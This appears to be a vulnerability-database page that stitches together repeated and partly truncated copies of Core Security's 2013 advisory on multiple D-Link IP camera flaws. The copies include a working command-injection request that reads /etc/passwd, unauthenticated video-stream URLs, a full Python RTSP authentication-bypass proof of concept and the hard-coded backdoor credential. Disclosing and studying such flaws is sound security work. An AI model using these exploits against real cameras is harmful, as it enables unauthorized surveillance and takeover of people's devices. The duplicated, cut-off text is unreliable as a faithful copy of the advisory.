D-Link support forum first. Then, an official public release will be
announced (approx. 1 month from forum post to full release). 2013-04-24:
Core asks for a clarification regarding the D-Link release date and
notifies that releasing fixes to a privileged closed group and/or a
closed forum or list is unacceptable. 2013-04-25:
Vendor notifies that the patches are ready and scheduled for posting on
D-Link web site over the next few days. 2013-04-26:
Core notifies that the advisory is re-scheduled for Monday 29th. 2013-04-29:
Advisory CORE-2013-0303 published.
9. *References*
[1] http://www.dlink.com/us/en/home-solutions/view/network-cameras.
[2]
http://corelabs.coresecurity.com/themes/sample_theme/images/coffee-pot.png.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0841 | CVE-2013-1601 |
plural D-Link Information disclosure vulnerabilities in products
Related entries in the VARIoT exploits database: VAR-E-201304-0137 |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
An Information Disclosure vulnerability exists due to a failure to restrict access on the lums.cgi script when processing a live video stream in D-LINK An Information Disclosure vulnerability exists due to a failure to restrict access on the lums.cgi script when processing a live video stream in D-LINK WCS-1100 1.02, TESCO DCS-2121 1.05_TESCO, TESCO DCS-2102 1.05_TESCO, DCS-7510 1.00, DCS-7410 1.00, DCS-6410 1.00, DCS-5635 1.01, DCS-5605 1.01, DCS-5230L 1.02, DCS-5230 1.02, DCS-3430 1.02, DCS-3411 1.02, DCS-3410 1.02, DCS-2121 1.06_FR, DCS-2121 1.06, DCS-2121 1.05_RU, DCS-2102 1.06_FR, DCS-2102 1.06, DCS-2102 1.05_RU, DCS-1130L 1.04, DCS-1130 1.04_US, DCS-1130 1.03, DCS-1100L 1.04, DCS-1100 1.04_US, and DCS-1100 1.03, which could let a malicious user obtain sensitive information. which could let a malicious user obtain sensitive information. plural D-Link The product contains an information disclosure vulnerability.Information may be obtained. There are security vulnerabilities in multiple D-Link webcam products. *Advisory Information*
Title: D-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0303
Advisory URL:
http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-03-29
Vendors contacted: D-Link Corporation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Authentication issues [CWE-287],
Information leak through GET request [CWE-598], Authentication issues
[CWE-287], Use of hard-coded credentials [CWE-798]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1599, CVE-2013-1600, CVE-2013-1601, CVE-2013-1602,
CVE-2013-1603
3. *Vulnerability Description*
Multiple vulnerabilities have been found in D-Link IP cameras [1] that
could allow an unauthenticated remote attacker:
1. [CVE-2013-1599] to execute arbitrary commands from the
administration web interface,
2. [CVE-2013-1600] to access the video stream via HTTP,
3. [CVE-2013-1601] to access the ASCII video stream via image luminance,
4. [CVE-2013-1602] to access the video stream via RTSP,
5. [CVE-2013-1603] to bypass RTSP authentication using hard-coded
credentials.
4. *Vulnerable Packages*
The following is the list of affected devices and the associated
firmware (confirmed by D-Link). Other SKUs are probably affected too,
but they were not checked.
[CVE-2013-1599]
. DCS-3411/3430 - firmware v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1600]
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
[CVE-2013-1601] and [CVE-2013-1603]
. DCS-3411/3430 - v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1602]
. ALL mentioned devices and firmware.
5. *Vendor Information, Solutions and Workarounds*
D-Link announces that all patches are ready and scheduled for posting on
corporate web site for all customers [2013-04-25]. Contact D-Link for
further information.
6. *Credits*
[CVE-2013-1599], [CVE-2013-1600] and [CVE-2013-1601] were discovered and
researched by Francisco Falcon and Nahuel Riva from Core Exploit Writers
Team.
[CVE-2013-1602] was discovered and researched by Martin Rocha from Core
Impact Pro Team. The PoC was made by Martin Rocha with help of Juan
Cotta from Core QA Team.
[CVE-2013-1603] was discovered and researched by Pablo Santamaria from
Core Security Consulting Services.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection*
[CVE-2013-1599] A security issue located in '/var/www/cgi-bin/rtpd.cgi'
allows an unauthenticated remote attacker to execute arbitrary commands
through the camera's web interface. The OS command injection is due to
this code in 'rtpd.cgi':
/-----
echo "$QUERY_STRING" | grep -vq ' ' || die "query string cannot contain
spaces."
. $conf > /dev/null 2> /dev/null
eval "$(echo $QUERY_STRING | sed -e 's/&/ /g')"
-----/
The first line of this snippet basically ensures that there are no
spaces in '$QUERY_STRING'. The last line uses 'sed' to replace
ampersands '&' with spaces, and then call to the function 'eval()',
resulting in a typical command injection. For example, in order to execute:
/-----
uname -a;cat /etc/passwd
-----/
the following request can be sent to the camera web interface:
/-----
http://192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd
-----/
7.2. *ASCII Video Stream Information Leak*
[CVE-2013-1601] An ASCII output (the image luminance) of the live video
stream can be accessed by a remote unauthenticated attacker via:
/-----
http://192.168.1.100/md/lums.cgi
-----/
The following example is the output of a coffee pot video stream [2]:
/-----
O O O O O O O O O O O O O O O O O O O O O O O O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O O O o o o O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O . o O O o o o o o o o o o o o
O O O O O O O O O O O O o o O O o . o o o o o o o o o o o o o o
O O O O O O O O O O O O o o o o . o o o o o o o
O O O O O O O O O O o . o O O o . o o o o o o
O O O O O O O O O . o o o o o o
O O O O O O O O . o o o o o o o o
O O O O O O O . o O O o . o o o o o o o o o
O O O O O O o . O O O O O O . o o o o o o o o o
O O O O O O . O O O O O O O . o o o o o o o o o
O O O O O O o O O O O O O O . o . o o o o o o o o
O O O O O O o O O O O O O O . o o o . o o o o o o o o
O O O O O O o O O O O O O o . o O O o O O . o o o o o o o
O O O O O O . o O O O O O O o . O O O o O O . o o o o o o
O O O O O O . O O O O O o . O O o o O O o . o o o o o o
O O O O O O o O O O O O o . o O O o o O O o . o o o o o
O O O O O O O O O O O O . o O O o o O O o . o o o o o
O O O O O O O . o O O O o . o o o O o o O O o . o o o o
O O O O O O O o . O O O o . o o o O o o O O o . o o o o
O O O O O O O O . O O O . o o o O o o O O o . o o o o
O O O O O O O O O O O . o o o O o o O O o . o o o
O O O O O O O O o o O o o o o o O o o o O o . o o o
O O O O O O O O O . O o o o o o O o . o O o . o o
O O O O O O O O O . O o . o o o o O . o O o . o
O O O O O O O O O o o . o o o o o . o O o . o
O O O O O O O O O O . o o o . o . o O o .
o O O O O O O O O O . o o o . o . O o .
o o O O O O O O O O o . o o o . o . O o .
o o o O O O O O O O o . o o o . o . O o .
-----/
7.4. *RTSP Authentication Bypass*
[CVE-2013-1602] This vulnerability is triggered because:
1. Authentication is only present in DESCRIBE requests but not in
every subsequent request.
2. When the RTSP session is being established, the authentication
request of current session is ignored (a previously stored response is
used instead).
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class DLink(Camera):
# D-Link DCS-2102/1.06-5731
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return
'\x76\x3d\x30\x0d\x0a\x6f\x3d\x43\x56\x2d\x52\x54\x53\x50\x48\x61\x6e\x64\x6c\x65\x72\x20\x31\x31\x32\x33\x34\x31\x32\x20\x30\x20\x49\x4e\x20\x49\x50\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x2e\x31\x31\x0d\x0a\x73\x3d\x44\x43\x53\x2d\x32\x31\x30\x32\x0d\x0a\x63\x3d\x49\x4e\x20\x49\x50\x34\x20\x30\x2e\x30\x2e\x30\x2e\x30\x0d\x0a\x74\x3d\x30\x20\x30\x0d\x0a\x61\x3d\x63\x68\x61\x72\x73\x65\x74\x3a\x53\x68\x69\x66\x74\x5f\x4a\x49\x53\x0d\x0a\x61\x3d\x72\x61\x6e\x67\x65\x3a\x6e\x70\x74\x3d\x6e\x6f\x77\x2d\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x2a\x0d\x0a\x61\x3d\x65\x74\x61\x67\x3a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0d\x0a\x6d\x3d\x76\x69\x64\x65\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x39\x36\x0d\x0a\x62\x3d\x41\x53\x3a\x31\x38\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x39\x36\x20\x4d\x50\x34\x56\x2d\x45\x53\x2f\x39\x30\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x31\x0d\x0a\x61\x3d\x66\x6d\x74\x70\x3a\x39\x36\x20\x70\x72\x6f\x66\x69\x6c\x65\x2d\x6c\x65\x76\x65\x6c\x2d\x69\x64\x3d\x31\x3b\x63\x6f\x6e\x66\x69\x67\x3d\x30\x30\x30\x30\x30\x31\x42\x30\x30\x31\x30\x30\x30\x30\x30\x31\x42\x35\x30\x39\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x43\x34\x38\x38\x42\x41\x39\x38\x35\x31\x34\x30\x34\x33\x43\x31\x34\x34\x33\x46\x3b\x64\x65\x63\x6f\x64\x65\x5f\x62\x75\x66\x3d\x37\x36\x38\x30\x30\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a\x6d\x3d\x61\x75\x64\x69\x6f\x20\x30\x20\x52\x54\x50\x2f\x41\x56\x50\x20\x30\x0d\x0a\x61\x3d\x72\x74\x70\x6d\x61\x70\x3a\x30\x20\x50\x43\x4d\x55\x2f\x38\x30\x30\x30\x0d\x0a\x61\x3d\x63\x6f\x6e\x74\x72\x6f\x6c\x3a\x74\x72\x61\x63\x6b\x49\x44\x3d\x32\x0d\x0a\x61\x3d\x73\x65\x6e\x64\x6f\x6e\x6c\x79\x0d\x0a'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, DLink((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
7.5. *RTSP Hard-Coded Credentials*
[CVE-2013-1603] RTSP service contains hard-coded credentials that
effectively serve as a backdoor, which allows remote attackers to access
the RTSP video stream.
/-----
username: (any)
password: ?*
-----/
As we can see in the following dump, the submitted password is compared
with the string ':?*' (the character ':' is used for concatenation of
'username:password'). This code belongs to the binary 'rtspd':
/-----
.text:00011468 loc_11468 ; Load from Memory
.text:00011468 LDR R3, [R11,#s2]
.text:0001146C STR R3, [R11,#var_C0] ; Store to Memory
.text:00011470 LDR R2, [R11,#var_C0] ; Load from Memory
.text:00011474 LDR R3, [R11,#var_BC] ; Load from Memory
.text:00011478 ADD R3, R2, R3 ; Rd = Op1 + Op2
.text:0001147C SUB R3, R3, #3 ; Rd = Op1 - Op2
.text:00011480 STR R3, [R11,#var_C0] ; Store to Memory
.text:00011484 LDR R0, [R11,#var_C0] ; s1
.text:00011488 LDR R1, =asc_1B060 ; ":?*" <-------
.text:0001148C MOV R2, #3 ; n
.text:00011490 BL strncmp ; Branch with Link
.text:00011494 MOV R3, R0 ; Rd = Op2
.text:00011498 CMP R3, #0 ; Set cond. codes on Op1 - Op2
.text:0001149C BNE loc_114BC ; Branch
-----/
8. *Report Timeline*
. 2013-03-19:
Core Security Technologies notifies the D-Link team of the vulnerability. 2013-03-20:
D-Link team asks for a technical description of the vulnerability. 2013-03-20:
Core sends a draft advisory with technical details and set the estimated
publication date of the advisory for May 14th, 2013. 2013-03-20:
Vendor notifies that D-Link Corporation has an unpublished bounty
program for security advisors. The bounty program requires both Core
Security and D-Link to sign a memo of understanding (MoU). 2013-03-25:
Core notifies that receiving money from vendors may bias the view of the
report and rejects the bounty program. 2013-03-29:
Vendor notifies that they hope to close the fix ASAP. 2013-04-08:
Vendor sends the list of vulnerable devices and the associated firmware
and notifies that they will release patches and release notes on the
D-Link support forum first. Then, an official public release will be
announced (approx. 1 month from forum post to full release). 2013-04-24:
Core asks for a clarification regarding the D-Link release date and
notifies that releasing fixes to a privileged closed group and/or a
closed forum or list is unacceptable. 2013-04-25:
Vendor notifies that the patches are ready and scheduled for posting on
D-Link web site over the next few days. 2013-04-26:
Core notifies that the advisory is re-scheduled for Monday 29th. 2013-04-29:
Advisory CORE-2013-0303 published.
9. *References*
[1] http://www.dlink.com/us/en/home-solutions/view/network-cameras.
[2]
http://corelabs.coresecurity.com/themes/sample_theme/images/coffee-pot.png.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0840 | CVE-2013-1600 |
plural D-Link Authentication vulnerabilities in products
Related entries in the VARIoT exploits database: VAR-E-201304-0137 |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
An Authentication Bypass vulnerability exists in upnp/asf-mp4.asf when streaming live video in D-Link TESCO DCS-2121 1.05_TESCO, TESCO DCS-2102 1.05_TESCO, DCS-2121 1.06_FR, 1.06, and 1.05_RU, DCS-2102 1.06_FR. 1.06, and 1.05_RU, which could let a malicious user obtain sensitive information. plural D-Link The product contains an authentication vulnerability.Information may be obtained. There are security vulnerabilities in multiple D-Link webcam products. Multiple D-Link webcam products have a verification bypass vulnerability in the online video stream, allowing unauthenticated remote attackers to submit 'http://192.168.1.100/upnp/asf-mp4.asf' requests for unauthorized access.
http://drupal.org/node/207891. *Advisory Information*
Title: D-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0303
Advisory URL:
http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-03-29
Vendors contacted: D-Link Corporation
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78], Authentication issues [CWE-287],
Information leak through GET request [CWE-598], Authentication issues
[CWE-287], Use of hard-coded credentials [CWE-798]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1599, CVE-2013-1600, CVE-2013-1601, CVE-2013-1602,
CVE-2013-1603
3. [CVE-2013-1599] to execute arbitrary commands from the
administration web interface,
2. [CVE-2013-1600] to access the video stream via HTTP,
3. [CVE-2013-1601] to access the ASCII video stream via image luminance,
4. [CVE-2013-1602] to access the video stream via RTSP,
5. [CVE-2013-1603] to bypass RTSP authentication using hard-coded
credentials.
4. *Vulnerable Packages*
The following is the list of affected devices and the associated
firmware (confirmed by D-Link). Other SKUs are probably affected too,
but they were not checked.
[CVE-2013-1599]
. DCS-3411/3430 - firmware v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1600]
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
[CVE-2013-1601] and [CVE-2013-1603]
. DCS-3411/3430 - v1.02
. DCS-5605/5635 - v1.01
. DCS-1100L/1130L - v1.04
. DCS-1100/1130 - v1.03
. DCS-1100/1130 - v1.04_US
. DCS-2102/2121 - v1.05_RU
. DCS-2102/2121 - v1.06
. DCS-2102/2121 - v1.06_FR
. TESCO DCS-2102/2121 - v1.05_TESCO
. DCS-3410 - v1.02
. DCS-5230 - v1.02
. DCS-5230L - v1.02
. DCS-6410 - v1.00
. DCS-7410 - v1.00
. DCS-7510 - v1.00
. WCS-1100 - v1.02
[CVE-2013-1602]
. ALL mentioned devices and firmware.
5. *Vendor Information, Solutions and Workarounds*
D-Link announces that all patches are ready and scheduled for posting on
corporate web site for all customers [2013-04-25]. Contact D-Link for
further information.
6. *Credits*
[CVE-2013-1599], [CVE-2013-1600] and [CVE-2013-1601] were discovered and
researched by Francisco Falcon and Nahuel Riva from Core Exploit Writers
Team.
[CVE-2013-1602] was discovered and researched by Martin Rocha from Core
Impact Pro Team. The PoC was made by Martin Rocha with help of Juan
Cotta from Core QA Team.
[CVE-2013-1603] was discovered and researched by Pablo Santamaria from
Core Security Consulting Services.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *OS Command Injection*
[CVE-2013-1599] A security issue located in '/var/www/cgi-bin/rtpd.cgi'
allows an unauthenticated remote attacker to execute arbitrary commands
through the camera's web interface. The OS command injection is due to
this code in 'rtpd.cgi':
/-----
echo "$QUERY_STRING" | grep -vq ' ' || die "query string cannot contain
spaces."
. $conf > /dev/null 2> /dev/null
eval "$(echo $QUERY_STRING | sed -e 's/&/ /g')"
-----/
The first line of this snippet basically ensures that there are no
spaces in '$QUERY_STRING'. The last line uses 'sed' to replace
ampersands '&' with spaces, and then call to the function 'eval()',
resulting in a typical command injection. For example, in order to execute:
/-----
uname -a;cat /etc/passwd
-----/
the following request can be sent to the camera web interface:
/-----
http://192.168.1.100/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd
-----/
7.2. *ASCII Video Stream Information Leak*
[CVE-2013-1601] An ASCII output (the image luminance) of the live video
stream can be accessed by a remote unauthenticated attacker via:
/-----
http://192.168.1.100/md/lums.cgi
-----/
The following example is the output of a coffee pot video stream [2]:
/-----
O O O O O O O O O O O O O O O O O O O O O O O O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O O O o o o O O O o o o o o o o o o o o o
O O O O O O O O O O O O O O O O O O . o O O o o o o o o o o o o o
O O O O O O O O O O O O o o O O o . o o o o o o o o o o o o o o
O O O O O O O O O O O O o o o o . o o o o o o o
O O O O O O O O O O o . o O O o . o o o o o o
O O O O O O O O O . o o o o o o
O O O O O O O O . o o o o o o o o
O O O O O O O . o O O o . o o o o o o o o o
O O O O O O o . O O O O O O . o o o o o o o o o
O O O O O O . O O O O O O O . o o o o o o o o o
O O O O O O o O O O O O O O . o . o o o o o o o o
O O O O O O o O O O O O O O . o o o . o o o o o o o o
O O O O O O o O O O O O O o . o O O o O O . o o o o o o o
O O O O O O . o O O O O O O o . O O O o O O . o o o o o o
O O O O O O . O O O O O o . O O o o O O o . o o o o o o
O O O O O O o O O O O O o . o O O o o O O o . o o o o o
O O O O O O O O O O O O . o O O o o O O o . o o o o o
O O O O O O O . o O O O o . o o o O o o O O o . o o o o
O O O O O O O o . O O O o . o o o O o o O O o . o o o o
O O O O O O O O . O O O . o o o O o o O O o . o o o o
O O O O O O O O O O O . o o o O o o O O o . o o o
O O O O O O O O o o O o o o o o O o o o O o . o o o
O O O O O O O O O . O o o o o o O o . o O o . o o
O O O O O O O O O . O o . o o o o O . o O o . o
O O O O O O O O O o o . o o o o o . o O o . o
O O O O O O O O O O . o o o . o . o O o .
o O O O O O O O O O . o o o . o . O o .
o o O O O O O O O O o . o o o . o . O o .
o o o O O O O O O O o . o o o . o . O o .
-----/
7.4. *RTSP Authentication Bypass*
[CVE-2013-1602] This vulnerability is triggered because:
1. Authentication is only present in DESCRIBE requests but not in
every subsequent request.
2. When the RTSP session is being established, the authentication
request of current session is ignored (a previously stored response is
used instead).
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class DLink(Camera):
